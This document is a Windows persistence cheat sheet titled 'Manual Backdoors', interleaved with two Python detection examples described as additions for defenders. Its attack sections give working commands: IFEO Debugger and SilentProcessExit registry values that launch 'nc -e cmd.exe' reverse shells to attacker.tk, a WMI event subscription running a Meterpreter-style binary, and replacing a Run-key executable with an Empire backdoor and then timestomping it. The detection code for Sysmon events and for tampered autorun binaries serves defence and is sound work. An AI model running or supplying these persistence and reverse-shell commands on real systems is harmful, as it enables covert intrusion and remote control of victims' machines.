Manual Backdoors

1: Image File Execution Options (IFEO) Debugger

copy calc.exe _calc.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe & c:\windows\nc.exe -e c:\windows\system32\cmd.exe attacker.tk 8888" /f

2: SilentProcessExit monitor process

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "nc -e \windows\system32\cmd.exe attacker.tk 8888"

3: WMI event subscription

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\users\admin\meter.exe",CommandLineTemplate="C:\users\admin\meter.exe"

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="persistence"", Consumer="CommandLineEventConsumer.Name="persistence""
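The three mechanisms above leave distinctive traces: a value write under an Image File Execution Options or SilentProcessExit subkey, and the creation of a WMI filter, consumer and binding. The following is an added detection example from the defender's side; it is not part of the original page. It runs a small rule set over constructed records shaped like Sysmon's RegistryEvent (Event ID 13) and WMI events (IDs 19, 20 and 21). The sample records, the rule names and the severity labels are assumptions made for this demo; the registry paths and the GlobalFlag bit 0x200 (decimal 512) come from the commands listed above.

```python
"""Flag IFEO Debugger, SilentProcessExit and WMI-subscription persistence in
Sysmon-style telemetry. Added example; SAMPLE_EVENTS is constructed."""
import re

# GlobalFlag bit that enables SilentProcessExit monitoring (0x200 == 512).
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200

IFEO_KEY = "\\image file execution options\\"
SPE_KEY = "\\silentprocessexit\\"

IFEO = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SPE = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit"

# Constructed sample events (dict form of the Sysmon fields used below).
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": IFEO + r"\calc.exe\Debugger",
     "Details": r"cmd /C _calc.exe & c:\windows\nc.exe -e c:\windows\system32\cmd.exe attacker.tk 8888"},
    {"EventID": 13, "TargetObject": IFEO + r"\notepad.exe\GlobalFlag", "Details": "DWORD (0x00000200)"},
    {"EventID": 13, "TargetObject": SPE + r"\notepad.exe\MonitorProcess",
     "Details": r"nc -e \windows\system32\cmd.exe attacker.tk 8888"},
    {"EventID": 19, "Name": "persistence", "EventNamespace": r"root\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Name": "persistence", "Type": "Command Line", "Destination": r"C:\users\admin\meter.exe"},
    {"EventID": 21, "Consumer": 'CommandLineEventConsumer.Name="persistence"', "Filter": '__EventFilter.Name="persistence"'},
    # Benign noise that must not fire: an ordinary Run entry, a harmless IFEO flag, a GlobalFlag without bit 0x200.
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    {"EventID": 13, "TargetObject": IFEO + r"\devenv.exe\DisableExceptionChainValidation", "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "TargetObject": IFEO + r"\svchost.exe\GlobalFlag", "Details": "DWORD (0x00000002)"},
]


def _dword(details):
    """Parse Sysmon's 'DWORD (0x00000200)' Details string to an int, else None."""
    m = re.match(r"DWORD \((0x[0-9A-Fa-f]+)\)", details or "")
    return int(m.group(1), 16) if m else None


def analyse_event(ev):
    """Return (rule, severity, subject, detail) for a matching event, else None."""
    eid = ev.get("EventID")
    if eid == 13:
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        low = target.lower()
        value_name = low.rsplit("\\", 1)[-1]          # last path element is the value name
        if IFEO_KEY in low and value_name == "debugger":
            return ("IFEO-Debugger", "high", target, details)
        if IFEO_KEY in low and value_name == "globalflag":
            flags = _dword(details)
            if flags is not None and flags & FLG_MONITOR_SILENT_PROCESS_EXIT:
                return ("IFEO-GlobalFlag-SilentExit", "medium", target, details)
        if SPE_KEY in low and value_name == "monitorprocess":
            return ("SilentProcessExit-MonitorProcess", "high", target, details)
    elif eid == 19:
        return ("WMI-EventFilter", "low", ev.get("Name"), ev.get("Query", ""))
    elif eid == 20:
        # Command-line and script consumers execute arbitrary payloads; log-file consumers are usually benign.
        sev = "high" if ev.get("Type") in ("Command Line", "Active Script") else "medium"
        return ("WMI-EventConsumer", sev, ev.get("Name"), ev.get("Destination", ""))
    elif eid == 21:
        return ("WMI-FilterToConsumerBinding", "medium", ev.get("Consumer"), ev.get("Filter", ""))
    return None


def scan(events):
    """Run every event through the rules and keep the hits."""
    return [hit for hit in (analyse_event(e) for e in events) if hit]


if __name__ == "__main__":
    for rule, sev, subject, detail in scan(SAMPLE_EVENTS):
        print(f"[{sev:6}] {rule}: {subject} -> {detail}")
```

Correlating the three WMI events by the shared `Name` ("persistence" here) is what turns three medium signals into one confident finding; a GlobalFlag write alone is weak, but paired with a MonitorProcess write for the same image name it is as conclusive as the Debugger value. Baseline IFEO keys before alerting on them, since debuggers and some vendor tools set values there legitimately.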

4: Replacing a Run-key binary and timestomping it

We'll simply plant a well-placed and seemingly benign executable, replacing an existing executable with our own backdoor.

While there are many registry keys that allow programs to execute at start time, most software vendors opt for the classic Run key. We query the Run key with the following command:

reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

This gives us a bunch of binaries to target. For example, if we decide to overwrite AGCInvokerUtility.exe with a custom backdoor (for example, a PowerShell script agent generated with Empire), we should rename it to bear the same name.

cp backdoor AGCInvokerUtility.exe

Then we switch to our C2 and upload it:

cd "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility"

upload AGCInvokerUtility.exe

To make our executable blend in more, we'll change its modification, access, and creation (MAC) times to the times shown by the original binary. First we get the MAC attributes of the old binary:

Get-Item AGCInvokerUtility_old.exe | select creationtime, lastaccesstime, lastwritetime

Then we set the same values on the new binary (for example, if the previous command returned 02/12/2013 12:31 for CreationTime, LastAccessTime and LastWriteTime):

powershell $(get-item AGCInvokerUtility.exe).creationtime=$(get-date '02/12/2013 12:31')

powershell $(get-item AGCInvokerUtility.exe).lastaccesstime=$(get-date '02/12/2013 12:31')

powershell $(get-item AGCInvokerUtility.exe).lastwritetime=$(get-date '02/12/2013 12:31')
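Timestamps set the way shown above have a tell: `get-date '02/12/2013 12:31'` produces a value exactly on the second, whereas timestamps written by the kernel almost always carry a non-zero sub-second component. The following is an added example from the defender's side, not code from the original page. It checks a Run-key binary against a known-good hash baseline and applies that heuristic to its timestamps. The baseline dictionary, the file contents and the temporary file used by `demo()` are constructed for the demo; the epoch value 1360672260 is simply 2013-02-12 12:31:00 UTC. The `check_autorun_binary` function takes the paths you get from `reg query ...\Run`; on Windows and macOS Python exposes a creation time (`st_birthtime_ns`), on Linux it does not, so that stamp is checked only where available.

```python
"""Detect a replaced and timestomped autorun binary: hash against a baseline,
then look for hand-set timestamps. Added example; all sample data is constructed."""
import hashlib
import os
import tempfile

NS = 1_000_000_000  # nanoseconds per second


def timestamp_flags(mtime_ns, atime_ns, birth_ns=None):
    """Return reasons a file's timestamps look hand-set rather than kernel-written.

    Zero sub-second parts are the classic timestomping tell (Set-Date style values
    are whole seconds); all stamps being identical to the nanosecond is a weaker
    second signal, since real activity touches them at different moments."""
    stamps = {"mtime": mtime_ns, "atime": atime_ns}
    if birth_ns is not None:
        stamps["birth"] = birth_ns
    reasons = [f"{name} has a zero sub-second component" for name, ns in stamps.items() if ns % NS == 0]
    if len(stamps) > 1 and len(set(stamps.values())) == 1:
        reasons.append("all timestamps identical to the nanosecond")
    return reasons


def sha256_file(path):
    """SHA-256 of a file, streamed so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_autorun_binary(path, baseline):
    """Compare one Run-key binary with a {lowercase filename: sha256} baseline and
    apply the timestamp heuristics. Returns a list of findings; empty means clean."""
    findings = []
    expected = baseline.get(os.path.basename(path).lower())
    actual = sha256_file(path)
    if expected is None:
        findings.append("no baseline entry for this binary")
    elif actual != expected:
        findings.append(f"hash mismatch: expected {expected[:12]}..., got {actual[:12]}...")
    st = os.stat(path)
    birth = getattr(st, "st_birthtime_ns", None)  # present on Windows/macOS, absent on Linux
    findings.extend(timestamp_flags(st.st_mtime_ns, st.st_atime_ns, birth))
    return findings


def demo():
    """Constructed scenario: a genuine binary is baselined, then replaced and
    stamped with 02/12/2013 12:31 exactly, as the PowerShell lines above do."""
    workdir = tempfile.mkdtemp()
    target = os.path.join(workdir, "AGCInvokerUtility.exe")
    with open(target, "wb") as f:
        f.write(b"MZ genuine constructed bytes")
    baseline = {"agcinvokerutility.exe": sha256_file(target)}
    # Kernel-like stamps for the genuine file: whole seconds plus a nanosecond part.
    os.utime(target, ns=(1360672260 * NS + 987654321, 1360672260 * NS + 123456789))
    # The replacement: different content, timestamps forced to the whole second.
    with open(target, "wb") as f:
        f.write(b"MZ replacement constructed bytes")
    stomped = 1360672260 * NS
    os.utime(target, ns=(stomped, stomped))
    return check_autorun_binary(target, baseline)


if __name__ == "__main__":
    for finding in demo():
        print("-", finding)
```

The hash comparison is the reliable part; the timestamp heuristic only raises suspicion and can miss an attacker who copies sub-second values from the original file. On NTFS the stronger check is to compare the `$STANDARD_INFORMATION` timestamps (the ones PowerShell sets) with the `$FILE_NAME` timestamps in the MFT, which the commands above do not touch; that needs an MFT parser and is outside this example.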
